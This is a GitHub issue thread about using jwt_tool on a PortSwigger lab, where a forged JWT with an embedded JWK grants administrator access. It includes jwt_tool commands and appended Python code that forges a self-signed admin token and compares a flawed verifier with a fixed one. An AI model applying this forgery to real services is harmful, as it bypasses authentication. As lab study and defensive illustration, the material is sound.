
JWK inline + payload modification #121

Open
0x2LFA opened this issue Nov 27, 2024 · 2 comments


0x2LFA commented Nov 27, 2024

Hi,

I am trying to solve this lab from PortSwigger academy using jwt_tool.

In order to solve the lab, one needs to inject a jwk into the JWT header, like the following:

{
    "kid": "76e1647e-29a6-4555-bfb1-ce848c18cbd5",
    "typ": "JWT",
    "alg": "RS256",
    "jwk": {
        "kty": "RSA",
        "e": "AQAB",
        "kid": "76e1647e-29a6-4555-bfb1-ce848c18cbd5",
        "n": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
    }
}

Also modify the payload to change sub to administrator:

{
    "iss": "portswigger",
    "exp": 1732711092,
    "sub": "administrator"
}

Then sign the JWT with the injected key in the jwk.


So far I've tried different combinations of options to obtain the requested JWT, without success.

For example I've tried:

jwt_tool.py -t {URL}  -rc 'session={JWT}' -I -pc sub -pv administrator -v

And got the jwt with modified payload:

Token: {"kid":"d2021ecd-3c75-4ca0-8715-e6b9829f930e","alg":"RS256"}.{"iss":"portswigger","exp":1732710178,"sub":"administrator"}.xxxxxxxxxxxxxxx

But then how can I use it with the -X i option to inject the inline jwt?

rbrown256 (Contributor) commented:

I came here for this as I wanted to inspect the source to find if this is a bug. I'm glad (so to speak) that somebody else has the same issue.

Now using jwt_tool with -X i injects the JWK but does not change the kid:

[screenshot omitted]

This means that the server side will be verifying the JWT payload using the signature from the original key (d2a8...).

What you need to do is update the kid to match with the following parameters:

-hc kid -hv jwt_tool

This makes the kid refer to the injected JWK:

[screenshot omitted]

rbrown256 (Contributor) commented:

I've created a fix here if you want to test this version with your original parameters?
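Added example, not jwt_tool's code and not the PortSwigger lab's: a self-contained Python model of why the two comments above matter. It implements a small RS256 (RSA PKCS#1 v1.5 with SHA-256) on the standard library alone with demo-sized keys, builds a legitimate server-signed token plus a self-signed one that carries its own public key as a header `jwk` and sets `sub` to administrator, and runs both through two verifiers: a flawed one that takes the key from the header `jwk` whenever that key's `kid` matches the header `kid` (an assumption about how the lab server behaves, consistent with the observation that an injected JWK left with the original `kid` is still checked against the original key), and a fixed one that resolves `kid` only against a server-side key set. The key ids `server-key-1` and `jwt_tool`, the user name `user` and the 1024-bit key size are constructed for this example.

```python
import base64
import hashlib
import json
import secrets

def b64u(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def unb64u(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def _is_probable_prime(n: int, rounds: int = 24) -> bool:
    if n < 2 or any(n % p == 0 for p in (2, 3, 5, 7, 11, 13)):
        return n in (2, 3, 5, 7, 11, 13)
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):  # Miller-Rabin with random witnesses
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x == 1:
            continue
        for _ in range(r):
            if x == n - 1:
                break
            x = pow(x, 2, n)
        else:
            return False
    return True

def rsa_keygen(bits: int = 1024) -> dict:  # demo-sized key; production code uses a real library
    def prime() -> int:  # random odd candidate of exact size until one passes the test
        while True:
            c = secrets.randbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
            if _is_probable_prime(c):
                return c
    e = 65537
    while True:
        p, q = prime(), prime()
        if p != q and (p - 1) % e and (q - 1) % e:  # gcd(e, phi) == 1
            return {"n": p * q, "e": e, "d": pow(e, -1, (p - 1) * (q - 1))}

_SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")

def _emsa(msg: bytes, k: int) -> int:  # EMSA-PKCS1-v1_5 of SHA-256(msg) for a k-byte modulus
    t = _SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return int.from_bytes(b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t, "big")

def rs256_sign(msg: bytes, key: dict) -> bytes:
    k = (key["n"].bit_length() + 7) // 8
    return pow(_emsa(msg, k), key["d"], key["n"]).to_bytes(k, "big")

def rs256_verify(msg: bytes, sig: bytes, pub: dict) -> bool:
    k = (pub["n"].bit_length() + 7) // 8
    return len(sig) == k and pow(int.from_bytes(sig, "big"), pub["e"], pub["n"]) == _emsa(msg, k)

def public_jwk(key: dict, kid: str) -> dict:
    enc = {f: b64u(key[f].to_bytes((key[f].bit_length() + 7) // 8, "big")) for f in ("n", "e")}
    return {"kty": "RSA", "kid": kid, **enc}

def jwk_to_pub(jwk: dict) -> dict:
    return {f: int.from_bytes(unb64u(jwk[f]), "big") for f in ("n", "e")}

def jwt_sign(header: dict, payload: dict, key: dict) -> str:
    signing_input = ".".join(b64u(json.dumps(x, separators=(",", ":")).encode()) for x in (header, payload))
    return signing_input + "." + b64u(rs256_sign(signing_input.encode(), key))

def _split(token: str):
    h, p, s = token.split(".")
    return json.loads(unb64u(h)), json.loads(unb64u(p)), unb64u(s), f"{h}.{p}".encode()

def verify_trusting_header_jwk(token: str, trusted_jwks: dict):
    """Flawed: a key carried inside the token is used whenever its kid matches the header kid."""
    header, payload, sig, signing_input = _split(token)
    kid, embedded = header.get("kid"), header.get("jwk")
    jwk = embedded if embedded and embedded.get("kid") == kid else trusted_jwks.get(kid)
    return payload if header.get("alg") == "RS256" and jwk and rs256_verify(signing_input, sig, jwk_to_pub(jwk)) else None

def verify_with_trusted_keys(token: str, trusted_jwks: dict):
    """Safe: only the server-side key set is consulted; a header "jwk" is never a key source."""
    header, payload, sig, signing_input = _split(token)
    jwk = trusted_jwks.get(header.get("kid"))
    return payload if header.get("alg") == "RS256" and jwk and rs256_verify(signing_input, sig, jwk_to_pub(jwk)) else None

def demo() -> dict:
    server_key, server_kid = rsa_keygen(), "server-key-1"  # constructed key id
    trusted = {server_kid: public_jwk(server_key, server_kid)}
    legit = jwt_sign({"kid": server_kid, "alg": "RS256"}, {"iss": "portswigger", "sub": "user"}, server_key)
    # Self-signed token shaped like the one in the issue: own public key embedded as "jwk", sub changed
    own_key, admin = rsa_keygen(), {"iss": "portswigger", "sub": "administrator"}
    own_jwk = public_jwk(own_key, "jwt_tool")
    matching = jwt_sign({"kid": "jwt_tool", "alg": "RS256", "jwk": own_jwk}, admin, own_key)
    stale_kid = jwt_sign({"kid": server_kid, "alg": "RS256", "jwk": own_jwk}, admin, own_key)  # -X i alone
    return {
        "legit/flawed": verify_trusting_header_jwk(legit, trusted),
        "forged/flawed": verify_trusting_header_jwk(matching, trusted),
        "stale_kid/flawed": verify_trusting_header_jwk(stale_kid, trusted),
        "legit/trusted": verify_with_trusted_keys(legit, trusted),
        "forged/trusted": verify_with_trusted_keys(matching, trusted),
    }
```

Calling `demo()` shows the flawed verifier accepting the self-signed administrator token only when the header `kid` points at the embedded key (the `stale_kid` case, where the original `kid` is left in place, falls back to the server's key and fails), which is the behaviour the `-hc kid -hv jwt_tool` parameters above account for. The fixed verifier rejects the self-signed token in both shapes while still accepting the legitimate one, because it never treats a header `jwk` as a key source.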
